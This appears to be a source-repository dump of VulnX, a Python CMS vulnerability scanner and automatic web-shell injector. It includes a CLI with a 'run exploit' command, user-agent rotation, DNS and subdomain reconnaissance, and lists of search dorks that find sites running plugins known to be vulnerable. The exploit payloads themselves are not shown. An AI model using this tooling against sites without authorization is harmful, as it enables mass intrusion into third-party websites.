D.searchengine(Cli.getDork(cmd_interpreter),headers,Cli.setOutput(cmd_interpreter_wp),numberpage) 470 | if back_regx.search(cmd_interpreter_wp_output): 471 | break 472 | if cls_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output=='cls': 473 | Cli._clearscreen() 474 | if exit_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output == 'quit': 475 | sys.exit() 476 | if help_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output=='?': 477 | Helpers._dorks_setdork_output_help() 478 | if history_regx.search(cmd_interpreter_wp_output): 479 | for i in range(len(history)): 480 | print(" %s %s"%(i+1,history[i-1])) 481 | if exec_regx.search(cmd_interpreter_wp_output): 482 | Cli._exec(cmd_interpreter_wp_output) 483 | if var_regx.search(cmd_interpreter_wp_output): 484 | Cli.dork_variable(Cli.getDork(cmd_interpreter),Cli.setOutput(cmd_interpreter_wp),numberpage) 485 | 486 | 487 | if run_regx.search(cmd_interpreter_wp): 488 | print('\n') 489 | from modules.dorksEngine import Dorks as D 490 | D.searchengine(Cli.getDork(cmd_interpreter),headers,output_dir,numberpage) 491 | if back_regx.search(cmd_interpreter_wp): 492 | break 493 | if help_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp=='?': 494 | Helpers._dorks_setdork_help() 495 | if cls_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp=='cls': 496 | Cli._clearscreen() 497 | if exit_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp == 'quit': 498 | sys.exit() 499 | if history_regx.search(cmd_interpreter_wp): 500 | for i in range(len(history)): 501 | print(" %s %s"%(i+1,history[i-1])) 502 | if exec_regx.search(cmd_interpreter_wp): 503 | Cli._exec(cmd_interpreter_wp) 504 | if var_regx.search(cmd_interpreter_wp): 505 | Cli.dork_variable(Cli.getDork(cmd_interpreter),output_dir,numberpage) 506 | 507 | 508 | 509 | def send_commands(self,cmd): 510 | while True: 511 | Cli.autoComplete_Global() 512 | cmd = input("%s%svulnx%s > "% (bannerblue2,W_UL,end)) 513 | history.append(cmd) 514 | if url_regx.search(cmd): 515 | #url session 516 | while True: 517 | cmd_interpreter=input("%s%svulnx%s%s target(%s%s%s) > %s" %(bannerblue2,W_UL,end,W,R,self.getUrl(cmd),W,end)) 518 | history.append(cmd_interpreter) 519 | if cmd_interpreter == 'back': 520 | break 521 | elif cmd_interpreter == 'run exploit': 522 | print('\n%s[*]%s Running exploits..' %(B,end)) 523 | root = self.getUrl(cmd) 524 | if root.startswith('http'): 525 | url_root = root 526 | else: 527 | url_root = 'http://'+url_root 528 | self.__runExploits(url_root,headers) 529 | elif help_regx.search(cmd_interpreter) or cmd_interpreter == '?': 530 | Helpers._url_action_help() 531 | elif exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit': 532 | sys.exit() 533 | else: 534 | print("use (help) (?) to show man commands.") 535 | elif dork_regx.search(cmd): 536 | #dork session 537 | self.setdorkCLI(cmd) 538 | elif exit_regx.search(cmd) or cmd == 'quit': 539 | sys.exit() 540 | elif help_regx.search(cmd) or cmd == '?': 541 | Helpers._general_help() 542 | elif cls_regx.search(cmd) or cmd == 'cls': 543 | Cli._clearscreen() 544 | elif history_regx.search(cmd): 545 | for i in range(len(history)): 546 | print(" %s %s"%(i+1,history[i-1])) 547 | elif exec_regx.search(cmd): 548 | Cli._exec(cmd) 549 | elif var_regx.search(cmd): 550 | Cli.global_variables(dorkname,output_dir,numberpage,url,timeout) 551 | else: 552 | print("use (help) (?) to show man commands.") 553 | -------------------------------------------------------------------------------- /common/__init__.py: -------------------------------------------------------------------------------- 1 | """The vulnx commonfiles.""" 2 | -------------------------------------------------------------------------------- /common/banner.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from common.colors import bannerblue , bannerblue2 ,W ,Y ,R,end 3 | 4 | def banner(): 5 | print("""%s 6 | 7 | .:. .:, 8 | xM; XK. 9 | dx' .lO. 10 | do ,0. 11 | .c.lN' , '. .k0.:' 12 | xMMk;d;''cOM0kWXl,',locMMX. 13 | .NMK. :WMMMMMMMx dMMc 14 | lMMO lWMMMMMMMMMO. lMMO 15 | cWMxxMMMMMMMMMMMMKlWMk 16 | .xWMMMMMMMMMMMMMMM0,%s 17 | .,OMd,,,;0MMMO,. 18 | .l0O.%sVXVX%sOX.%sVXVX%s0MO%sVXVX%s.0Kd, 19 | lWMMO0%sVXVX0%sOX.%sVXVX%sl%sVXVX%s.VXNMMO 20 | .MMX;.N0%sVXVX0%s0X.%sVXVXVX0%s.0M:.OMMl 21 | .OXc ,MMO%sVXVX0%sVX%s .VXVX0%s0MMo ,0X' 22 | 0x. :XMMMk%sVXVX.%sXO.%sVXVX%sdMMMWo. :X' 23 | .d 'NMMMMMMk%sVXVX%s..%sVXVX0%s.XMMMMWl ;c 24 | 'NNoMMMMMMx%sVXVXVXVXVX0.%sXMMk0Mc 25 | .NMx OMMMMMMd%sVXVXVX%sl%sVXVX%s.NW.;MMc 26 | :NMMd .NMMMMMMd%sVXVX%sdMd,,,,oc ;MMWx 27 | .0MN, 'XMMMMMMo%sVX%soMMMMMMWl 0MW, 28 | .0. .xWMMMMM:lMMMMMM0, kc 29 | ,O. .:dOKXXXNKOxc. do 30 | '0c -VulnX- ,Ol 31 | ;. :. 32 | 33 | %s# Coded By Anouar Ben Saad -%s @anouarbensaad 34 | %s""" 35 | % 36 | (bannerblue,bannerblue2, 37 | W,bannerblue2,W,bannerblue2,W,bannerblue2, 38 | W,bannerblue2,W,bannerblue2,W,bannerblue2, 39 | W,bannerblue2,W,bannerblue2, 40 | W,bannerblue2,W,bannerblue2, 41 | W,bannerblue2,W,bannerblue2, 42 | W,bannerblue2,W,bannerblue2, 43 | W,bannerblue2, 44 | W,bannerblue2,W,bannerblue2, 45 | W,bannerblue2, 46 | W,bannerblue2, 47 | W,Y,end 48 | )) 49 | -------------------------------------------------------------------------------- /common/colors.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Module Of Colors. 3 | OS : Ubuntu 4 | ''' 5 | 6 | import sys 7 | 8 | if sys.platform.lower().startswith(('os', 'win', 'darwin', 'ios')): 9 | # Colors shouldn't be displayed on Mac and Windows 10 | bannerblue = bannerblue2 = yellowhead = \ 11 | W = Y = R = G = B = bg = green = \ 12 | run = good = bad = info = red = end = que = \ 13 | failexploit = vulnexploit = portopen = portclose = '' 14 | else: 15 | #banner Colors 16 | bannerblue = '\033[34m' 17 | bannerblue2 = '\033[1;1;94m' 18 | yellowhead = '\033[1;1;94m' 19 | #default colors 20 | W = '\033[97m' # white 21 | Y = '\033[93m' # yellow 22 | R = '\033[91m' 23 | G = '\033[92m' 24 | B = '\033[94m' 25 | bg = '\033[7;91m' 26 | green = '\033[92m' 27 | #action colors 28 | run = '\033[93m[~]\033[0m' 29 | good = '\033[92m[+]\033[0m' 30 | bad = '\033[91m[-]\033[0m' 31 | info = '\033[93m[!]\033[0m' 32 | red = '\033[91m' 33 | end = '\033[0m' 34 | que = '\033[94m[?]\033[0m' 35 | #test colors 36 | failexploit = '\033[91mFAIL\033[0m' 37 | vulnexploit = '\033[92mVULN\033[0m' 38 | portopen = '\033[92mOPEN \033[0m' 39 | portclose = '\033[91mCLOSE\033[0m' 40 | -------------------------------------------------------------------------------- /common/output_wr.py: -------------------------------------------------------------------------------- 1 | 2 | import os 3 | import sys 4 | 5 | def writelogs(data, data_name, output_dir): 6 | """Write the results.""" 7 | for data, data_name in zip(data, data_name): 8 | if data: 9 | filepath = output_dir + '/' + data_name + '.txt' 10 | with open(filepath, 'w+') as out_file: 11 | joined = '\n'.join(data) 12 | out_file.write(str(joined.encode('utf-8').decode('utf-8'))) 13 | out_file.write('\n') -------------------------------------------------------------------------------- /common/requestUp.py: -------------------------------------------------------------------------------- 1 | 2 | import random 3 | import requests 4 | from requests.exceptions import TooManyRedirects 5 | from common.uriParser import parsing_url as hostd 6 | 7 | SESSION = requests.Session() 8 | SESSION.max_redirects = 2 9 | 10 | def random_UserAgent(): 11 | useragents_rotate = [ 12 | "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]", 13 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)", 14 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", 15 | "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)", 16 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", 17 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9", 18 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246", 19 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)", 20 | "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1", 21 | "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1", 22 | "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02", 23 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36", 24 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", 25 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0", 26 | "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36", 27 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1", 28 | "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8", 29 | "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01" 30 | ] 31 | useragents_random = random.choice(useragents_rotate) 32 | return useragents_random 33 | 34 | def getrequest( 35 | url, 36 | headers, 37 | timeout=3, 38 | ): 39 | """GetRequest without ssl verification""" 40 | headers = set() 41 | def get(url): 42 | # Selecting a random user-agent 43 | response = SESSION.get( 44 | url, 45 | headers=headers, 46 | verify=False, 47 | timeout=timeout, 48 | stream=True, 49 | ) 50 | return response.text 51 | return get(url) 52 | 53 | def sendrequest( 54 | url, 55 | headers=None, 56 | data=None, 57 | timeout=3, 58 | ): 59 | """GetRequest without ssl verification""" 60 | headers = set() 61 | data = set() 62 | def post(url): 63 | response = SESSION.post( 64 | url, 65 | data=data, 66 | headers=headers, 67 | verify=False, 68 | timeout=timeout, 69 | stream=True, 70 | ) 71 | return response.text 72 | return post(url) -------------------------------------------------------------------------------- /common/threading.py: -------------------------------------------------------------------------------- 1 | import concurrent.futures 2 | 3 | from common.colors import info 4 | 5 | def threads(function, thread_count): 6 | """ Threadpool Uses """ 7 | threads = concurrent.futures.ThreadPoolExecutor( 8 | max_workers=thread_count) 9 | confuture = (threads.submit(function)) 10 | for i, _ in enumerate(concurrent.futures.as_completed(confuture)): 11 | print('%s Progress IN : %i' % (info, i + 1), end='\r') 12 | print('') -------------------------------------------------------------------------------- /common/uriParser.py: -------------------------------------------------------------------------------- 1 | import re 2 | from urllib.parse import urlparse 3 | 4 | def parsing_url(url): 5 | host = urlparse(url).netloc 6 | return host 7 | -------------------------------------------------------------------------------- /config/vulnx.desktop: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Name=vulnx 3 | Comment=VulnX 🕷️ Cms and vulnerabilites detector, & An intelligent bot auto shell injector. 4 | Encoding=UTF-8 5 | Exec=sh -c "vulnx;${SHELL:-bash}" 6 | Icon=vulnxicon.png 7 | StartupNotify=false 8 | Terminal=true 9 | Type=Application 10 | Categories=02-Vulnerability-Analysis; 11 | X-Kali-Package=vulnx 12 | Name[C]=vulnx 13 | -------------------------------------------------------------------------------- /config/vulnxicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LulzSecToolkit/vulnx/d5b6fba86c0d316622ad1f12d11884bd85a7a7cb/config/vulnxicon.png -------------------------------------------------------------------------------- /docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com 3 | 4 | # Project Informations. 5 | LABEL name vulnx 6 | LABEL src "https://github.com/anouarbensaad/vulnx" 7 | LABEL creator anouarbensaad 8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\ 9 | fast cms detection of target and fast scanner and informations gathering like\ 10 | subdomains, \ 11 | ipaddresses,\ 12 | country, \ 13 | org, \ 14 | timezone, \ 15 | region, \ 16 | ans \ 17 | and more ...\ 18 | Instead of injecting shell and checking it works like all the other tools do,\ 19 | vulnx analyses the response with and recieve if shell success uploaded or no.\ 20 | vulnx is searching for urls with dorks." 21 | 22 | # Clonning Vulnx From Github 23 | RUN apk add --no-cache git && \ 24 | git clone https://github.com/anouarbensaad/vulnx.git 25 | 26 | # Make vulnx group 27 | RUN addgroup vulnx 28 | 29 | # added \\vulnx [group] secondary group to vulnx. 30 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx 31 | 32 | # change vulnx owner of directory of project. 33 | RUN chown -R vulnx vulnx 34 | 35 | # Switch user. 36 | USER vulnx 37 | 38 | ENV APP_HOME=vulnx 39 | 40 | # Working−Directory 41 | WORKDIR $APP_HOME 42 | 43 | # Install Pip Packages. 44 | RUN pip install --user --upgrade pip && \ 45 | pip install --user -r ./requirements.txt 46 | 47 | # Add Mount Volume Docker To Save All changes. 48 | VOLUME [ "/vulnx" ] 49 | 50 | # Entrypoint -> Command : While Creating Container. 51 | ENTRYPOINT [ "python", "vulnx.py" ] 52 | 53 | # Default Command When Starting The Container. 54 | CMD ["--help"] 55 | -------------------------------------------------------------------------------- /docker/README: -------------------------------------------------------------------------------- 1 | ### Docker Documentation. 2 | Welcome to the vulnx DOCKER documentation. 3 | The vulnx DOCKER documentation is generated as a rule of usage docker. 4 | 5 | You can build docker-image & run container for no problem of comptability: 6 | $ docker build -t vulnx ./docker/ 7 | $ docker run -it --name vulnx vulnx:latest -u http://example.com 8 | -------------------------------------------------------------------------------- /docker/debian_stretch/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:stretch-slim 2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com 3 | 4 | # Project Informations. 5 | LABEL name vulnx 6 | LABEL src "https://github.com/anouarbensaad/vulnx" 7 | LABEL creator anouarbensaad 8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\ 9 | fast cms detection of target and fast scanner and informations gathering like\ 10 | subdomains, \ 11 | ipaddresses,\ 12 | country, \ 13 | org, \ 14 | timezone, \ 15 | region, \ 16 | ans \ 17 | and more ...\ 18 | Instead of injecting shell and checking it works like all the other tools do,\ 19 | vulnx analyses the response with and recieve if shell success uploaded or no.\ 20 | vulnx is searching for urls with dorks." 21 | 22 | # Install Git, 23 | RUN apt-get update -qq && \ 24 | apt-get install -qq -y --no-install-recommends --no-install-suggests && \ 25 | git && \ 26 | rm -rf /var/lib/apt/lists/* && \ 27 | apt-get clean && \ 28 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/* 29 | 30 | # Make Vulnx Directory & Clonning Vulnx From Github 31 | RUN mkdir -p /usr/share/vulnx && cd usr/share/vulnx && \ 32 | git clone https://www.github.com/anouarbensaad/vulnx 33 | 34 | # Make vulnx group 35 | RUN addgroup vulnx 36 | 37 | # added \\vulnx [group] secondary group to vulnx. 38 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx 39 | 40 | # change vulnx owner of directory of project. 41 | RUN chown -R vulnx vulnx 42 | 43 | # Switch user. 44 | USER vulnx 45 | 46 | # Working−Directory 47 | WORKDIR vulnx 48 | 49 | # Install Python3 & Pip 3 50 | RUN apt-get -qq update \ 51 | apt-get install -qq -y --no-install-recommends \ 52 | python3 \ 53 | python3-pip && \ 54 | rm -rf /var/lib/apt/lists/* && \ 55 | apt-get clean && \ 56 | rm -rf /tmp/* /var/tmp/* /usr/share/doc/* 57 | 58 | # Install Pip Packages. 59 | RUN pip3 install requests && \ 60 | pip3 install bs4 61 | 62 | # Add Mount Volume Docker To Save All changes. 63 | VOLUME [ "/vulnx" ] 64 | 65 | #run container with it mode & run python3 vulnx.py -u ... 66 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | red="\e[0;31m" 4 | blue="\e[0;94m" 5 | green="\e[0;32m" 6 | off="\e[0m" 7 | #vulnx install function for Android. termux 8 | function banner(){ 9 | echo -e "===== VULNX INSTALL =====" 10 | } 11 | function termuxOS() { 12 | echo -e "$red [$green+$red]$off Installing Python ..."; 13 | pkg install python 14 | echo -e "$red [$green+$red]$off Installing Packages ..."; 15 | pip install -r ./requirements.txt 16 | echo -e "$red [$green+$red]$off Checking directories ..." 17 | if [ -e "/data/data/com.termux/files/usr/share/vulnx" ]; then 18 | echo -e "$red [$green+$red]$off A previous installation was found Do you want to replace it? [Y/n]: " 19 | read replace 20 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then 21 | rm -r "/data/data/com.termux/files/usr/share/vulnx" 22 | rm "/data/data/com.termux/files/usr/bin/vulnx" 23 | else 24 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations"; 25 | echo -e "$red [$green✘$red]$off Installation Failed"; 26 | exit 27 | fi 28 | fi 29 | echo -e "$red [$green+$red]$off Installing ..."; 30 | mkdir "/data/data/com.termux/files/usr/share/vulnx" 31 | cp "vulnx.py" "/data/data/com.termux/files/usr/share/vulnx" 32 | cp "install.sh" "/data/data/com.termux/files/usr/share/vulnx" 33 | cp "update.sh" "/data/data/com.termux/files/usr/share/vulnx" 34 | cp -r "./common" "/data/data/com.termux/files/usr/share/vulnx" 35 | cp -r "./modules" "/data/data/com.termux/files/usr/share/vulnx" 36 | cp -r "./shell" "/data/data/com.termux/files/usr/share/vulnx" 37 | chmod +x /data/data/com.termux/files/usr/share/vulnx/update.sh 38 | echo -e "$red [$green+$red]$off Creating Symbolic Link ..."; 39 | echo "#!/data/data/com.termux/files/usr/bin/bash 40 | python /data/data/com.termux/files/usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx"; 41 | cp "vulnx" "/data/data/com.termux/files/usr/bin" 42 | chmod +x "/data/data/com.termux/files/usr/bin/vulnx" 43 | rm "vulnx"; 44 | if [ -d "/data/data/com.termux/files/usr/share/vulnx" ] ; 45 | then 46 | echo -e "$red [$green+$red]$off Tool successfully installed and will start in 5s!"; 47 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 48 | sleep 5; 49 | vulnx 50 | else 51 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 52 | exit 53 | fi 54 | } 55 | #vulnx install function for debian operating system. linux. 56 | function debianOS(){ 57 | echo -e "$red [$green+$red]$off Installing python3... "; 58 | sudo apt-get install -y python3 59 | pip install -r ./requirements.txt 60 | echo -e "$red [$green+$red]$off Checking directories... " 61 | if [ -d "/usr/share/VulnX" ]; then 62 | echo -e "$red [$green+$red]$off A Directory VulnX Was Found! Do You Want To Replace It? [Y/n]:" ; 63 | read replace 64 | if [ "$replace" == "y" ] || [ "$replace" == "Y" ] || [ -z "$replace" ]; then 65 | sudo rm -r "/usr/share/vulnx" 66 | sudo rm "/usr/share/icons/vulnxicon.png" 67 | sudo rm "/usr/share/applications/vulnx.desktop" 68 | sudo rm "/usr/local/bin/vulnx" 69 | else 70 | echo -e "$red [$green✘$red]$off If You Want To Install You Must Remove Previous Installations"; 71 | echo -e "$red [$green✘$red]$off Installation Failed"; 72 | exit 73 | fi 74 | fi 75 | echo -e "$red [$green+$red]$off Installing ..."; 76 | echo -e "$red [$green+$red]$off Creating Symbolic Link ..."; 77 | echo -e "#!/bin/bash 78 | python3 /usr/share/vulnx/vulnx.py" '${1+"$@"}' > "vulnx"; 79 | chmod +x "vulnx"; 80 | sudo mkdir "/usr/share/vulnx" 81 | sudo cp "install.sh" "/usr/share/vulnx" 82 | sudo cp "update.sh" "/usr/share/vulnx" 83 | sudo cp -r "./common" "/usr/share/vulnx/" 84 | sudo cp -r "./modules" "/usr/share/vulnx/" 85 | sudo cp -r "./shell" "/usr/share/vulnx/" 86 | sudo chmod +x /usr/share/vulnx/update.sh 87 | sudo cp "vulnx.py" "/usr/share/vulnx" 88 | sudo cp "config/vulnxicon.png" "/usr/share/icons" 89 | sudo cp "config/vulnx.desktop" "/usr/share/applications" 90 | sudo cp "vulnx" "/usr/local/bin/" 91 | rm "vulnx"; 92 | if [ -d "/usr/share/vulnx" ] ; 93 | then 94 | echo -e "$red [$green+$red]$off Tool Successfully Installed And Will Start In 5s!"; 95 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 96 | sleep 5; 97 | vulnx 98 | else 99 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 100 | exit 101 | fi 102 | } 103 | #main 104 | if [ -d "/data/data/com.termux/files/usr/" ]; then 105 | banner 106 | echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System"; 107 | termuxOS 108 | elif [ -d "/usr/bin/" ];then 109 | banner 110 | echo -e "$red [$green+$red]$off Vulnx Will Be Installed In Your System"; 111 | debianOS 112 | else 113 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 114 | exit 115 | fi 116 | -------------------------------------------------------------------------------- /modules/__init__.py: -------------------------------------------------------------------------------- 1 | """The vulnx Modules.""" 2 | -------------------------------------------------------------------------------- /modules/dnsLookup.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import base64 4 | import json 5 | from common.colors import red, green, bg, G, R, W, Y, G , good , bad , run , info , end , que , bannerblue 6 | from bs4 import BeautifulSoup 7 | from common.uriParser import parsing_url as hostd 8 | 9 | def results(table): 10 | res = [] 11 | trs = table.findAll('tr') 12 | for tr in trs: 13 | tds = tr.findAll('td') 14 | pattern_ip = r'([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})' 15 | try: 16 | ip = re.findall(pattern_ip, tds[1].text)[0] 17 | domain = str(tds[0]).split('
')[0].split('>')[1] 18 | header = ' '.join(tds[0].text.replace('\n', '').split(' ')[1:]) 19 | reverse_dns = tds[1].find('span', attrs={}).text 20 | 21 | additional_info = tds[2].text 22 | country = tds[2].find('span', attrs={}).text 23 | autonomous_system = additional_info.split(' ')[0] 24 | provider = ' '.join(additional_info.split(' ')[1:]) 25 | provider = provider.replace(country, '') 26 | data = {'domain': domain, 27 | 'ip': ip, 28 | 'reverse_dns': reverse_dns, 29 | 'as': autonomous_system, 30 | 'provider': provider, 31 | 'country': country, 32 | 'header': header} 33 | res.append(data) 34 | except: 35 | pass 36 | return res 37 | 38 | def text_record(table): 39 | res = [] 40 | for td in table.findAll('td'): 41 | res.append(td.text) 42 | return res 43 | 44 | 45 | def dnsdumper(url): 46 | domain = hostd(url) 47 | dnsdumpster_url = 'https://dnsdumpster.com/' 48 | response = requests.Session().get(dnsdumpster_url) 49 | soup = BeautifulSoup(response.text, 'html.parser') 50 | # If no match is found, the return object won't have group method, so check. 51 | try: 52 | csrf_token = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value'] 53 | except AttributeError: # No match is found 54 | csrf_token = soup.findAll('input', attrs={'name': 'csrfmiddlewaretoken'})[0]['value'] 55 | print (' %s Retrieved token: %s' % (info,csrf_token)) 56 | cookies = {'csrftoken': csrf_token} 57 | headers = {'Referer': 'https://dnsdumpster.com/'} 58 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain } 59 | response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers) 60 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain) 61 | if response.status_code == 200: 62 | soup = BeautifulSoup(response.content, 'html.parser') 63 | tables = soup.findAll('table') 64 | res = {} 65 | res['domain'] = domain 66 | res['dns_records'] = {} 67 | res['dns_records']['dns'] = results(tables[0]) 68 | res['dns_records']['mx'] = results(tables[1]) 69 | print(' %s Search for DNS Servers' % que) 70 | for entry in res['dns_records']['dns']: 71 | print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end))) 72 | print(' %s Search for MX Records ' % que) 73 | for entry in res['dns_records']['mx']: 74 | print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format(**entry)% (good,good,good,bannerblue,end))) 75 | def domain_info(url): 76 | domain = hostd(url) 77 | dnsdumpster_url = 'https://dnsdumpster.com/' 78 | response = requests.Session().get(dnsdumpster_url).text 79 | # If no match is found, the return object won't have group method, so check. 80 | try: 81 | csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response).group(1) 82 | except AttributeError: # No match is found 83 | csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'", response) 84 | cookies = {'csrftoken': csrf_token} 85 | headers = {'Referer': 'https://dnsdumpster.com/'} 86 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain } 87 | response = requests.Session().post('https://dnsdumpster.com/',cookies=cookies, data=data, headers=headers) 88 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain) 89 | if response.status_code == 200: 90 | soup = BeautifulSoup(response.content, 'html.parser') 91 | tables = soup.findAll('table') 92 | res = {} 93 | res['domain'] = domain 94 | res['dns_records'] = {} 95 | res['dns_records']['host'] = results(tables[3]) 96 | print(' %s SubDomains' % que) 97 | for entry in res['dns_records']['host']: 98 | print((" %s SubDomain : {domain} \n %s IP : {ip} \n %s----------------%s".format(**entry)% (good,good,bannerblue,end))) 99 | -------------------------------------------------------------------------------- /modules/dorksEngine.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Dorks Engine Module. 3 | github Repository : http://github.com/anouarbensaad/findorks 4 | ''' 5 | 6 | import requests 7 | import re 8 | import time 9 | import random 10 | import os 11 | from common.colors import run,W,end,good,bad,que,info,bannerblue 12 | from common.uriParser import parsing_url as parsify 13 | filename = time.strftime("%Y-%m-%d-%H%M%S-Dorks") 14 | output_dirdorks = 'logs'+'/Dorks' 15 | 16 | if not os.path.exists(output_dirdorks): # if the directory doesn't exist 17 | os.mkdir(output_dirdorks) # create a new directory 18 | export = open('%s/%s.txt' % (output_dirdorks,filename),'w') 19 | else: 20 | export = open('%s/%s.txt' % (output_dirdorks,filename),'w') 21 | 22 | 23 | wp_contentdorks = { 24 | 'blaze' : 'inurl:"/wp-content/plugins/blaze-slide-show-for-wordpress/"', 25 | 'catpro' : 'inurl:"/wp-content/plugins/wp-catpro/"', 26 | 'cherry' : 'inurl:"/wp-content/plugins/cherry-plugin/"', 27 | 'dm' : 'inurl:"/wp-content/plugins/downloads-manager/"', 28 | 'fromcraft' : 'inurl:"/wp-content/plugins/formcraft/file-upload/"', 29 | 'synoptic' : 'inurl:"/wp-content/themes/synoptic/lib/avatarupload"', 30 | 'shop' : 'inurl:"/wp-content/plugins/wpshop/includes/"', 31 | 'revslider' : 'inurl "/wp-content/plugins/revslider/"', 32 | 'adsmanager' : 'inurl:"/wp-content/plugins/simple-ads-manager/"', 33 | 'inboundiomarketing': 'inurl:"/wp-content/plugins/inboundio-marketing/"', 34 | 'thumbslider' : 'inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider"', 35 | } 36 | wp_admindorks = { 37 | 'wysija' : 'inurl":/wp-admin/admin-post.php?page=wysija_campaigns"', 38 | 'powerzoomer' : 'inurl:"/wp-admin/admin.php?page=powerzoomer_manage"', 39 | 'showbiz' : 'inurl:"/wp-admin/admin-ajax.php"', 40 | } 41 | 42 | wpajx = { 43 | 'jobmanager' : 'inurl:"/jm-ajax/upload_file/"', 44 | } 45 | 46 | 47 | wpindex = { 48 | 'injection' : 'inurl:"/index.php/wp-json/wp/"', 49 | } 50 | 51 | 52 | joomla = { 53 | 'comjce' : 'inurl":index.php?option=com_jce"', 54 | 'comfabrik' : 'inurl":index.php?option=com_fabrik"', 55 | 'comjdownloads' : 'inurl":index.php?option=com_fabrik"', 56 | 'comfoxcontact' : 'inurl":index.php?option=com_foxcontact"', 57 | } 58 | 59 | prestashop = { 60 | 'columnadverts' : 'inurl":/modules/columnadverts/"', 61 | 'soopabanners' : 'inurl":/modules/soopabanners/"', 62 | 'vtslide' : 'inurl":/modules/soopabanners/"', 63 | 'simpleslideshow' : 'inurl":/modules/simpleslideshow/"', 64 | 'productpageadverts' : 'inurl":/modules/productpageadverts/"', 65 | 'productpageadvertsb' : 'inurl":/modules/homepageadvertise2/"', 66 | 'jro_homepageadvertise' : 'inurl":/modules/jro_homepageadvertise/"', 67 | 'attributewizardpro' : 'inurl":/modules/attributewizardpro/"', 68 | 'oneattributewizardpro' : 'inurl":/modules/1attributewizardpro/"', 69 | 'attributewizardpro_old' : 'inurl":/modules/attributewizardpro.OLD/"', 70 | 'attributewizardpro_x' : 'inurl":/modules/attributewizardpro_x/"', 71 | 'advancedslider' : 'inurl":/modules/advancedslider/"', 72 | 'cartabandonmentpro' : 